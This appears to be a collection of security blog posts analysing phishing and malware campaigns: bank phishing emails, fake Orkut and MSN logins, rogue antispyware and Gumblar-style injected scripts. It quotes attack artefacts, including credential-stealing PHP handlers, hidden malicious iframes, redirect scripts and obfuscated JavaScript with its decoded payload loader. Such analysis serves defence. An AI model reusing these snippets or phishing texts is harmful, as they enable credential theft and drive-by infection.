We have seen how an Short url service can exploited by malware , now this can be made secure by verifying the final url against service like – stopbadware.
And we have seen in real time ,that it is effective against malware exploitation & this should be implemented in all similar service to make web experience more safe.
Short URL service has been exploited for spreading malware for an long time , here is one example
Hi! Please look at this short video. What are they doing?
tube23441.notlong.com/
following message is posted to google group , this redirects to
eusebiotanis.150m.com – this is again a freehosting page
<script>
window.location.href=("hxxp://flashtubes.net/xplay.php?id=45230");
</script>
this loads following malware.
<CENTER><A
href="hxxp://freefilesarchive.com/flash-HQ-plugin.45230.exe"><IMG
onmouseover="window.status = 'Download Streaming Player Media please!';"
alt="You must Download and Run Video Controller Object to play this video file."
src="img/xplayer.gif" border=0></A>
</CENTER></DIV>
Short URL – can lead to malware sites, so beware if you click one.
whois information shows
Registrant:
N/A
Farah F Jones
2733 Canis Heights Drive
City Of Commerce
California,90040
With every new release there is same release of fake to steal user information. Here it is for New orkut.
user would receive spam mail with an invitation to join new orkut.
but link points to .
orkutnew.ning.com/?xgi=31XH2qxBierBjA&xg_source=msg_invite_net
site gets the user orkut profile information ,
this is site hosted to ning service with an malicious intent.
With long list of Indian Phishing Bank site , now there is raise of Phishing for “Bank Of India”
Here is mail received with intention to phish
Dear Customer,
Bank of India is constantly striving to provide you with more convenience, control, and security to assist in managing your finances.
As part of our ongoing efforts to make it easier and more secure for you to use our online services, we have upgraded to Consent and
Online Access that you reviewed and accepted when you began-to use Bank of India Online® Banking service(s).
To upgrade your Information, please visit our secure server webform by clicking the link below...
Upgrade My Account Security.
This alert relates to your Online Banking Profile only.
Upgrade My Account Security Links to Following hacked site
harveys.ie/images/inet/boi/BankAwayRetail.html
this site reads and sends the account information to an gmail id using a PHP file.
$recipient = "xxxxxx@gmail.com";
$subject = "boi login";
$headers = "BOI@boi.co.in";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: http://www.bankofindia.com/");
}
else
{
echo "ERROR! Please go back and try again.";
}
This has become most common infection these days , Rouge Antispyware.Way they spread has varied from Fake codec to Link to a Genuine site with page linked to malicious site.
Here in our case this was a mail send from a hacked yahoo account with link to Hindu Temple Site.
hxxp://www.shrikhatushyamji.com/Wvse2KU8VD.html
this page contains the malicious link
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>CONGRATULATIONS</title>
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("http://vivilan.cn");
//-->
</script>
<noscript>
<meta http-equiv="Refresh" content="0; URL=http://vivilan.cn">
</noscript>
</head>
<body>
<a href="http://vivilan.cn">Click here...</a>
</body>
</html>
From this site it downloads Surprise.exe – Trojan.TDSS–
This install Rouge Antispyware as an Payload.
Here is the Posting to a google group
this link redirects to
hxxp://numberstencils.net/images/www/index.php
above link connected with following rouge antispyware
hxxp://scanonlinesite.info/downloads.php/?aff_id=91&aff_Aid=20106&adult
above fake scanner is loaded from the web page and drops following file.
Following file prompts to run as administrator and here is the manifest
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Today Received phishing mail for PNB , this second mail in a week seems rise in phishing for punjab national bank.Here is the content of the mail
“
PUNJAB NATIONAL BANK SECURITY UPDATE
Punjab National Bank is pleased to notify our online banking customers that
we have successfully upgraded to a more secure and encrypted SSL servers
to serve our esteemed customers for a better and more efficient banking
services in the year 2009.
Due to this recent upgrade you are requested to update your Online Banking
information by following the reference below by using our new secure and safe
SSL servers. To Validate and Secure your Online Banking Account click on the
secure Web Form below;
http://www.netbanking.netpnb.com?onlinesecurity-update
”
but link is connected to following link
“hxxp://http://savepix.net/thumbs/punjab/index.htm – > this host the phishing page
This site has been hacked reason is found using Acunetix Web Vulnerability scanner.
This Time following iframed site comes in top of Google Pages for , “Indian Jewels” with pages hosted from india
hxxp://nacjewellers.com
this site has an IFRAME to
hxxp://yournamequickshop.cn:8080/index.php
AS that has this site is
So if you are using google to get some sites , beware your chance of getting infected is high.
Here is the Google trends India Data
site in focus is - worldoftimepass.com
site is currently blocked by safe browsing
this is malicious script
1: function/*iEkb*/QwGb(PFTC,/*iEkb*/TUBM,/*iEkb*/vIDK){document.writeln("<u/*iEkb*/id=\""+PFTC+"\"/*iEkb*/style=\""+vIDK+"\">"+TUBM+"</u>");}function/*iEkb*/nMeL(PFTC){cLyM/*iEkb*/=/*iEkb*/document.getElementById(PFTC);return/*iEkb*/cLyM.innerHTML;}var/*iEkb*/uWaL/*iEkb*/=/*iEkb*/unescape("\x75\x6e\x65\x73\x63\x61\x70\x65"),/*iEkb*/ADyk/*iEkb*/=/*iEkb*/unescape("\x65\x76\x61\x6c"),/*iEkb*/cLyM,/*iEkb*/nTOs;QwGb("uWaL","\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x74\x72\x61\x6d\x61\x64\x6f\x6c\x73\x70\x61\x63\x65\x2e\x72\x75\x2f\x73\x79\x6d\x70\x6c\x65\x2e\x68\x74\x6d\x6c\x27\x20\x69\x64\x3d\x27\x36\x27\x20\x6e\x61\x6d\x65\x3d\x27\x31\x27\x20\x73\x74\x79\x6c\x65\x3d\x27\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\x27\x20\x61\x6c\x69\x67\x6e\x3d\x27\x6c\x65\x66\x74\x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e","display:none;");var/*iEkb*/BTmX/*iEkb*/=/*iEkb*/nMeL("uWaL");nTOs/*iEkb*/=/*iEkb*/eval(uWaL);BTmX/*iEkb*/=/*iEkb*/nTOs(BTmX);
this decodes to
tramadolspace.ru/symple.html
above sites returns error 404 .
Ask Toolbar has been installed with a shareware program , but I uninstalled from add/remove programs. But still I could see that in my IE , by typing google.com i get the following page.
Very Weird ,Here is where it still stays
This is totally bad improper un installation and redirection on competitor web pages.
This is phish email for ICICI (submitted to phishtank)
hosted to
hxxp://ayitipeyipam.org/css/data/onlineverification.do/
from here it redirects to
hxxp:/ayitipeyipam.org/css/data/onlineverification.do/index2.html
there is twist here
See it
this page is very same to paypal ,confirmed with the script
1: // This is an ugly hack until there is a reliable ondomready function 2: if(typeof PAYPAL != 'undefined'){ 3: PAYPAL.core.Navigation.init();4: }</scr
Then it lands on to a page where it asks for card information.
after that it shows thank you message,
and finally lands to Original site ,so user will never know that he has been phished.
1: <META HTTP-EQUIV="Refresh" CONTENT="5;URL=https://infinity.icicibank.co.in/Login.jsp" ></body>
This is with compromised Orkut account , the fake orkut login link are updated as links go down periodically
Here is the new link
hxxp://wwworkutnewscrapcom.tk
this has the iframe to
hxxp://scrap222.kilu.de/index.html
this where the fake page is hosted
Here is the source that executes a php to post the user name and password.
1: <form id="gaia_loginform" action="run.php" method="get"
2: onsubmit="return(gaia_onLoginSubmit());">
php is similar to following script
1: <?php /* Created on: 3/27/2007 */
2: $fp = fopen("OrkutPasswords.htm", "a");
3: fwrite($fp, "Email:$_POST[Email]\tPassword:$_POST[Passwd]");
4: echo "<HTML>
5: <head> 6: <title>Welcome to Hack-Genius</title> 7: <FRAMESET cols=\"*\"> 8: <FRAME SRC=\"http://www.hack-genius.blogspot.com\"> 9: </FRAMESET>";?>Currently is been removed from the torrent site , its good for now.
Luckysploit was all over the web with mass defacement and serving malware.Today i got an alert for an web page
hxxp://dailybreadhost.com
this site was injected with script which decodes to
hxxp://www.fujifork.co.jp
Following site has 2 iframe
1: <iframe src='hxxp://www.fujifork.co.jp/' width=1 height=1 style='visibility: hidden'></iframe><iframe src='hxxp://82.103.131.211/maco/?6e662d941e448da7c36e018acb86120b' width=1 height=1 style='visibility: hidden'></iframe>
but no malware this time, but still net is not safe. Here is the Safe browsing report for the site for more information
Following site
pmegp.in/ - Prime Minister's Employment Generation Programme
have been attacked and following malicious script was inserted.
1: 2: (function(){var cVrd='%';var Fvm=unescape(('&76ar&20a&3d&22ScriptE&6egine&22&2cb&3d&22Vers&69on() +&22&2c&6a&3d&22&22&2c&75&3dnav&69g&61t&6fr&2e&75ser&41&67ent&3bif&28(&75&2eind&65xO&66(&22Win&22)&3e&30&29&26&26 (u&2ein&64&65&78&4ff(&22&4e&54&20&36&22)&3c0&29&26&26&28docume&6et&2eco&6fk&69e&2e&69n&64exOf(&22m&69ek&3d&31&22) &3c&30&29&26&26(typeof(zrvzts)&21&3dtyp&65of(&22A&22)))&7bzrvz&74s&3d&22A&22&3beva&6c&28&22if (win&64&6fw&2e&22+a+&22) j&3dj+&22&2ba&2b&22M&61jor&22&2bb&2ba&2b&22&4d&69n&6fr&22+b+&61+&22&42uild&22+b+&22&6a&3b&22) &3bdocum&65n&74&2ewrite (&22&3cscri&70&74&20s&72c&3d&2f&2fg&75&6dblar&2ecn&2frss&2f&3f&69d&3d&22&2bj+&22&3e&3c&5c&2fscrip&74&3e&22&29&3b&7d' ).replace(/&/g,cVrd));eval(Fvm)})();
This is Decrypted to
1: var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&& (document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+") j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/? id="+j+"><\/script>");}
this is redirects to cn site here is the report on same.
http://www.google.com/safebrowsing/diagnostic?site=gumblar.cn
The following is fake site getting MSN user information
hxxp://thatzparty.com/login.php
Here is the Privacy Policy 
what they do is spam, site is registered by CSS Management Inc, this also have 23 other domains all the same spamming the net.
The third annual Counter-eCrime Operations Summit (CeCOS III) will engage questions of operational challenges and the development of common resources for the first responders and forensic professionals who protect consumers and enterprises from the ecrime threat every day. This year's meeting will focus on the development of response paradigms and resources for counter-ecrime managers and forensic professionals. Presenters will proffer case studies of national and regional economies under attack, narratives of successful trans-national forensic cooperation as well as models for cooperation and unified response against ecrime and data resources for forensic activities.
Following link was posted to a profile , which redirects to a Fake Orkut Login.
hxxp://orkutnew2009fastorkutwelcomeoekut2009.tk/
User information was captured by
hxxp://rajroxx.blackapplehost.com/run.php
also same information was posted to Orkut login page, so it can prompt for right user name and password.
Beware for such sites.
Initial vector: Whatsapp spam user posing as union bank with logo in user profile shared apk file named as “Union Bank Aadhaar Update....
